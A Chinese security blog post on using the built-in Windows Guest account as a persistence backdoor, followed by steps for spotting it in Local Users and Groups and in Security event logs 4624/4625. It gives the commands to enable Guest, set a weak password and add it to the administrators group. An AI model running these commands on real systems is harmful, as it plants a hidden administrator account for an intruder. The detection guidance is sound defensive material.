【Tips+1】Windows持久化之Guest 后门

admin 2023年11月20日21:22:21评论9 views字数 857阅读2分51秒阅读模式
 

实现原理

Guest 帐户是一种特殊的用户帐户,通常用于提供有限的系统访问权限,同时限制了用户对系统资源的访问。它通常被用于提供公共或临时访问,例如公共计算机、客人访问或共享资源。

Guest 帐户是Windows系统内置的账户,默认情况下是未启用的。我们可以使用命令启用guest 账户实现权限维持。

实现步骤

【Tips+1】Windows持久化之Guest 后门

该用户是windows 系统自带的游客用户,我们通过以下命令即可启用Guest用户

net user Guest /active:yes

执行启用命令之后,我们可以看到如下变化

【Tips+1】Windows持久化之Guest 后门

接下来,我们就可以给guest 账户设置密码,添加管理员权限了。

1、net user guest /active:yes 启用guest用户
2、net user guest 123 设置密码为123
3、net localgroup administrators guest /add 加到管理员组

【Tips+1】Windows持久化之Guest 后门

最后使用guest 账户登录成功

【Tips+1】Windows持久化之Guest 后门

如何排查

方法如下:

1、打开“本地用户和组“,查看Guest 的状态是否已经开启。

2、使用命令查看是否开启:

【Tips+1】Windows持久化之Guest 后门

【Tips+1】Windows持久化之Guest 后门

日志排查

  1. 打开事件查看器
    • 按下 Windows + X 键,然后选择“事件查看器”。
    • 在控制面板中,选择“管理工具”,然后选择“事件查看器”。
  1. 在事件查看器中,展开“Windows 日志”并选择“安全”日志。这是记录与用户帐户相关活动的日志。
  2. 在右侧的操作面板中,您可以使用筛选器来查找 Guest 帐户的活动。使用以下筛选条件来查找 Guest 帐户的活动:
    • 在“事件来源”字段中,选择 "Microsoft-Windows-Security-Auditing"。
    • 在“操作代码”字段中,选择 "4624"(表示成功登录)或 "4625"(表示登录失败)。
    • 在“帐户名称”字段中,输入 "Guest"。
  1. 这将过滤日志,只显示与 Guest 帐户相关的登录事件。
  2. 检查筛选后的事件列表,以查看 Guest 帐户的登录尝试、成功或失败的情况。您可以查看事件详细信息,包括时间戳、IP 地址、登录类型等信息。

【Tips+1】Windows持久化之Guest 后门

 

【Tips+1】Windows持久化之Guest 后门

 

 

原文始发于微信公众号(贝雷帽SEC):【Tips+1】Windows持久化之Guest 后门

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月20日21:22:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【Tips+1】Windows持久化之Guest 后门http://cn-sec.com/archives/2220924.html

发表评论

匿名网友 填写信息